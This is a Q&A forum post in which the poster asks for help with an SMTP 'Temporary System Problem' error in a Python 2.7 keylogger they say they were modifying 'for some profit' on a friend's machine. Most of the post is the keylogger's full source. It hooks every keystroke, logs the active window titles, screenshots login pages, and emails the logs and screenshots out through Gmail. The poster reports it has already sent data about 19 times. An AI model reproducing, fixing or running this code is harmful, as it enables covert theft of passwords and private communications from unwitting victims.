# Python Smtplib Sendmail Error

Tags: python, python-2.7, smtplib

I was improvising on my Friends keylogger for some profit yesterday. When I run the py file of the keylogger in python IDLE I get this error

```
Traceback (most recent call last):
  File "C:\Python27\Scripts\Configure.py", line 263, in <module>
    sendEmail()
  File "C:\Python27\Scripts\Configure.py", line 224, in sendEmail
    server.sendmail(LOG_FROM, LOG_MAIL, msg.as_string())
  File "C:\Python27\lib\smtplib.py", line 743, in sendmail
    (code, resp) = self.data(msg)
  File "C:\Python27\lib\smtplib.py", line 504, in data
    raise SMTPDataError(code, repl)
SMTPDataError: (421, '4.7.0 Temporary System Problem.  Try again later (RQ).       z29sm64505579pff.0 - gsmtp')
```

Note that Configure.py is the name of the keylogger. Here is the Keylogger :

```
#!/usr/bin/python

   # Automated Keylogger 0.1a #
   # ------------------------ #
   # > www.TechnicDynamic.com #
   # ------------------------ #

   # Credits to original code from DaniWeb forums:
   # http://www.daniweb.com/software-                     development/python/threads/229564/python-keylogger

   # Currently works on Windows only
   # -------------------------------
   # * Records all keystrokes
   # * Takes automated screenshots (see config below)
   # * Sends email containing logs and screenshots


   # Required modules
   # ----------------
   # Make sure they're all installed if you plan to compile it yourself.

   from time import sleep
   from threading import Timer
   from threading import Thread
   from email.mime.text import MIMEText
   from email.mime.image import MIMEImage
   from PIL import Image, ImageGrab
   from email.mime.multipart import MIMEMultipart
   import subprocess, socket, base64, time, datetime, os, sys, urllib2,        platform
   import pythoncom, pyHook, Image, ImageGrab, win32api, win32gui, win32con,        smtplib

   # Keylogger settings
   #################################
   # Email Settings             #
   LOG_SENDMAIL = False         # set to True to send emails
   LOG_MAIL = 'email@gmail.com'     # account email address (must exist)
   LOG_PASS = 'password'            # email's password (must exist)
   LOG_FROM = 'bla@blabla.com'      # email will be sent from this address        
   LOG_SUBJ = 'Long time my friend'# email subject
   LOG_MSG = 'Howdy!'               # email content - the body
   # ----------------------------- #
   # Screenshot Settings            #
   LOG_SCREENSHOT = False           # set to True to take screenshot(s)
   LOG_SCREENSNUM = 3               # set amount of screenshot to take.
   LOG_INTERVAL = 2             # interval between each screenshot.
   LOG_SCREEN = []                  # this list contains matches for taking                             automated screenshots...
   #LOG_SCREEN.append("Facebook")   # for example, if it finds "Facebook" in        titlebar..
   #LOG_SCREEN.append("Sign In")    # or if it finds "Sign In", common email        login page.
   #LOG_SCREEN.append("Google")     # -- 'watchu googlin fool?
   # ----------------------------- #
   # System Settings                # [shouldn't be modified]
   LOG_FILENAME = 'tmpConf.txt' # log file (current directory)
   LOG_TOSEND = []                  # contains files to send in email        attachment
   LOG_ACTIVE = ''                  # stores active window
   LOG_STATE = False                # Start keylogger as false
   LOG_TIME = 0                 # amount of time to log in seconds, where 0 = infinite and 86400 = 1 day
   LOG_TEXT = ""                    # this is the raw log var which will be                      written to file
   LOG_TEXTSIZE = 0             # marks the beginning and end of new text               blocks that separate logs
   LOG_MINTERVAL = 86400            # main loop intervals in seconds, where 86400 = 1 day (default)
   LOG_THREAD_kl = 0                # thread count for keylogger
   LOG_THREAD_ss = 0                # thread count for automated screenshots
   # ----------------------------- #
   # Debug [Don't change]           #
   # LOG_ITERATE = 3                #
   # print os.getcwd()              #
   #################################

   # this sets the thread ID before execution.
   main_thread_id = win32api.GetCurrentThreadId()

   def Keylog(k, LOG_TIME, LOG_FILENAME):
       # only supported for Windows at the moment...
       if os.name != 'nt': return "Not supported for this operating system.\n"
       global LOG_TEXT, LOG_FILE, LOG_STATE, LOG_ACTIVE, main_thread_id
       LOG_STATE = True # begin logging!
       main_thread_id = win32api.GetCurrentThreadId()
       # add timestamp when it starts...
       LOG_TEXT += "\n===================================================\n"
       LOG_DATE = datetime.datetime.now()
       LOG_TEXT += ' ' + str(LOG_DATE) + ' >>> Logging started.. |\n'
       LOG_TEXT += "===================================================\n\n"
       # find out which window is currently active!
       w = win32gui
       LOG_ACTIVE = w.GetWindowText (w.GetForegroundWindow())
       LOG_DATE = datetime.datetime.now()
       LOG_TEXT += "[*] Window activated. [" + str(LOG_DATE) + "] \n"
       LOG_TEXT += "=" * len(LOG_ACTIVE) + "===\n"
       LOG_TEXT += " " + LOG_ACTIVE + " |\n"
       LOG_TEXT += "=" * len(LOG_ACTIVE) + "===\n\n"
       if LOG_TIME > 0:
           t = Timer(LOG_TIME, stopKeylog) # Quit
           t.start()
       # open file to write
       LOG_FILE = open(LOG_FILENAME, 'w')
       LOG_FILE.write(LOG_TEXT)
LOG_FILE.close()
       hm = pyHook.HookManager()
       hm.KeyDown = OnKeyboardEvent
       hm.HookKeyboard()
       pythoncom.PumpMessages() # this is where all the magic happens! ;)
       # after finished, we add the timestamps at the end.
       LOG_FILE = open(LOG_FILENAME, 'a')
       LOG_TEXT +=        "\n\n===================================================\n"
       LOG_DATE = datetime.datetime.now()
       LOG_TEXT += " " + str(LOG_DATE) + ' >>> Logging finished. |\n'
       LOG_TEXT += "===================================================\n"
       LOG_STATE = False
       try: 
           LOG_FILE.write(LOG_TEXT)
           LOG_FILE.close()
       except:
           LOG_FILE.close()
       return True

   # this function stops the keylogger...
   # thank God for the StackOverflow thread! :D
   def stopKeylog():
       win32api.PostThreadMessage(main_thread_id, win32con.WM_QUIT, 0, 0);

   # this function actually records the strokes...
   def OnKeyboardEvent(event):
              global LOG_STATE, LOG_THREAD_ss
              # return if it isn't logging.
       if LOG_STATE == False: return True
       global LOG_TEXT, LOG_FILE, LOG_FILENAME, LOG_ACTIVE, LOG_INTERVAL,                      LOG_SCREENSHOT, LOG_SCREENSNUM
       LOG_TEXT = ""
       LOG_FILE = open(LOG_FILENAME, 'a')
       # check for new window activation
       wg = win32gui
       LOG_NEWACTIVE = wg.GetWindowText (wg.GetForegroundWindow())
       if LOG_NEWACTIVE != LOG_ACTIVE:
           # record it down nicely...
           LOG_DATE = datetime.datetime.now()
           LOG_TEXT += "\n\n[*] Window activated. [" + str(LOG_DATE) + "] \n"
           LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n"
           LOG_TEXT += " " + LOG_NEWACTIVE + " |\n"
           LOG_TEXT += "=" * len(LOG_NEWACTIVE) + "===\n\n"
           LOG_ACTIVE = LOG_NEWACTIVE
           # take screenshots while logging!
           if LOG_SCREENSHOT == True:
               LOG_IMG = 0
               while LOG_IMG < len(LOG_SCREEN):
                   if LOG_NEWACTIVE.find(LOG_SCREEN[LOG_IMG]) > 0:
                       LOG_TEXT += "[*] Taking " + str(LOG_SCREENSNUM) + "        screenshot for \"" + LOG_SCREEN[LOG_IMG] + "\" match.\n"
                       LOG_TEXT += "[*] Timestamp: " + str(datetime.datetime.now()) + "\n\n"
                       ss = Thread(target=takeScreenshots, args=       (LOG_THREAD_ss,LOG_SCREENSNUM,LOG_INTERVAL))
                       ss.start()
                       LOG_THREAD_ss += 1 # add 1 to the thread counter
                   LOG_IMG += 1
           LOG_FILE.write(LOG_TEXT)

       LOG_TEXT = ""    
       if event.Ascii == 8: LOG_TEXT += "\b"
       elif event.Ascii == 13 or event.Ascii == 9: LOG_TEXT += "\n"
       else: LOG_TEXT += str(chr(event.Ascii))
       # write to file
       LOG_FILE.write(LOG_TEXT) 
       LOG_FILE.close()

       return True

   # screenshot function
          def Screenshot():
       img=ImageGrab.grab()
       saveas=os.path.join(time.strftime('%Y_%m_%d_%H_%M_%S')+'.png')
       img.save(saveas)
       if LOG_SENDMAIL == True:
           addFile = str(os.getcwd()) + "\\" + str(saveas)
           LOG_TOSEND.append(addFile) # add to the list

   # take multiple screenshots function
   # args = number of shots, interval between shots
   def takeScreenshots(i, maxShots, intShots):
       shot = 0
       while shot < maxShots:
           shottime = time.strftime('%Y_%m_%d_%H_%M_%S')
           Screenshot()
           time.sleep(intShots)
           shot += 1


   # send email function
   # this example is for GMAIL, if you use a different server
   # you MUST change the line below to the server/port needed
   # server = smtplib.SMTP('smtp.gmail.com:587')
   def sendEmail():
       msg = MIMEMultipart()
       msg['Subject'] = LOG_SUBJ
       msg['From'] = LOG_FROM
       msg['To'] = LOG_MAIL
       msg.preamble = LOG_MSG
       # attach each file in LOG_TOSEND list  
       for file in LOG_TOSEND:
           # attach text file
           if file[-4:] == '.txt':
               fp = open(file)
               attach = MIMEText(fp.read())
               fp.close()
           # attach images
           elif file[-4:] == '.png':
               fp = open(file, 'rb')
               attach = MIMEImage(fp.read())
               fp.close()
           attach.add_header('Content-Disposition', 'attachment;        filename="%s"' % os.path.basename(file))
           msg.attach(attach)

       server = smtplib.SMTP('smtp.gmail.com:587')
       server.starttls()  
       server.login(LOG_MAIL, LOG_PASS)
       server.sendmail(LOG_FROM, LOG_MAIL, msg.as_string())  
       server.quit()

   # function to clean up fiels
   def deleteFiles():
       if len(LOG_TOSEND) < 1: return True
       for file in LOG_TOSEND:
           os.unlink(file)


   #        begin keylogging
   kl        = Thread(target=Keylog, args=(LOG_THREAD_kl,LOG_TIME,LOG_FILENAME))
   kl       .start()

   #        if keylogging is running infinitely
   if        LOG_TIME < 1:
       # begin continuous loop
       while True:

           # zZzzzzZZzzZ
           time.sleep(LOG_MINTERVAL) # sleep for time specified

           LOG_NEWFILE = time.strftime('%Y_%m_%d_%H_%M_%S') + ".txt"
           # add file to the LOG_TOSEND list
           if LOG_SENDMAIL == True:
               addFile = str(os.getcwd()) + "\\" + str(LOG_NEWFILE)
               LOG_TOSEND.append(addFile) # add to the list

           LOG_SAVEFILE = open(LOG_NEWFILE, 'w')
           LOG_CHCKSIZE = open(LOG_FILENAME, 'r')
           LOG_SAVEFILE.write(LOG_CHCKSIZE.read())
           LOG_CHCKSIZE.close()
           try:
               LOG_SAVEFILE.write(LOG_SAVETEXT)
               LOG_SAVEFILE.close()
           except:
               LOG_SAVEFILE.close()

           # send email
           if LOG_SENDMAIL == True:
               sendEmail()
               time.sleep(6)
               deleteFiles()
           LOG_TOSEND = [] # clear this list


   # otherwise sleep for specified time, then break program
   elif LOG_TIME > 0:
       # sleep for time specified
       time.sleep(LOG_TIME)
       time.sleep(2)
       # check to send email
       if LOG_SENDMAIL == True:
           addFile = str(os.getcwd()) + "\\" + str(LOG_FILENAME)
           LOG_TOSEND.append(addFile) # add to the list
           sendEmail()
       time.sleep(2)

   sys.exit()
```

This keylogger is not made by me and I was only Improvising it and hence had no plans for using it.

Here is the screenshot for the python IDLE

[Image -Updated](https://i.stack.imgur.com/GmY3c.png)

The `Up and running` and `Network Currently down` are my ways to ensure that connection is there before it sends the keylogger to the receiver's mail id. Again I am only improvising. So you can see that it succeeded sending the data almost 19 times but then the error showed up. So I can I fix it ?

Regards,

Note- I updated the Image